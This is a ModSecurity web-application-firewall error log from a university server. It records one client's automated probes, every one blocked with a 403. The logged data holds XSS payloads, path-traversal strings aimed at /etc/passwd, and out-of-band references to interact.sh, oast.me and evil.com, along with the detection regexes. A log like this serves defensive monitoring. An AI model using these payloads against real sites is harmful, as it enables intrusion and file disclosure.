[Tue Aug 29 11:55:12.532694 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAApXgm0AAAAU"]
[Tue Aug 29 11:55:12.626960 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApbUdcAAAAh"]
[Tue Aug 29 11:55:14.663993 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApbUeAAAAAh"]
[Tue Aug 29 11:55:15.723577 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16M8Co-f0AAAqqtcoAAAAA"]
[Tue Aug 29 11:55:16.528752 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqTvo4AAAAa"]
[Tue Aug 29 11:55:16.968107 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6CIAAAAr"]
[Tue Aug 29 11:55:17.589182 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqSwrMAAAAN"]
[Tue Aug 29 11:55:17.698459 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqw51EAAAAH"]
[Tue Aug 29 11:55:18.706975 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqvjnYAAAAE"]
[Tue Aug 29 11:55:19.753511 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAoAk-gAAAAC"]
[Tue Aug 29 11:55:19.823394 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAoAk-oAAAAC"]
[Tue Aug 29 11:55:20.668950 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAApbUfUAAAAh"]
[Tue Aug 29 11:55:22.605723 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAApbUfsAAAAh"]
[Tue Aug 29 11:55:22.741377 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApHRgsAAAAP"]
[Tue Aug 29 11:55:23.975403 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAAqSwsoAAAAN"]
[Tue Aug 29 11:55:23.975974 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAApa-OcAAAAg"]
[Tue Aug 29 11:55:23.991250 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAqeFVYAAAAx"]
[Tue Aug 29 11:55:24.662731 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAAqTvqkAAAAa"]
[Tue Aug 29 11:55:24.679512 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAqeFVwAAAAx"]
[Tue Aug 29 11:55:25.649024 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqsV60AAAAB"]
[Tue Aug 29 11:55:25.940741 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAApa-PUAAAAg"]
[Tue Aug 29 11:55:26.750864 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAApa-P8AAAAg"]
[Tue Aug 29 11:55:28.692588 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAApbUh0AAAAh"]
[Tue Aug 29 11:55:29.893596 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAoz8G0AAAAS"]
[Tue Aug 29 11:55:30.552386 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAolKqgAAAAe"]
[Tue Aug 29 11:55:30.690060 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAAqSwuMAAAAN"]
[Tue Aug 29 11:55:31.588775 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAqTvswAAAAa"]
[Tue Aug 29 11:55:32.560116 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAqTvtQAAAAa"]
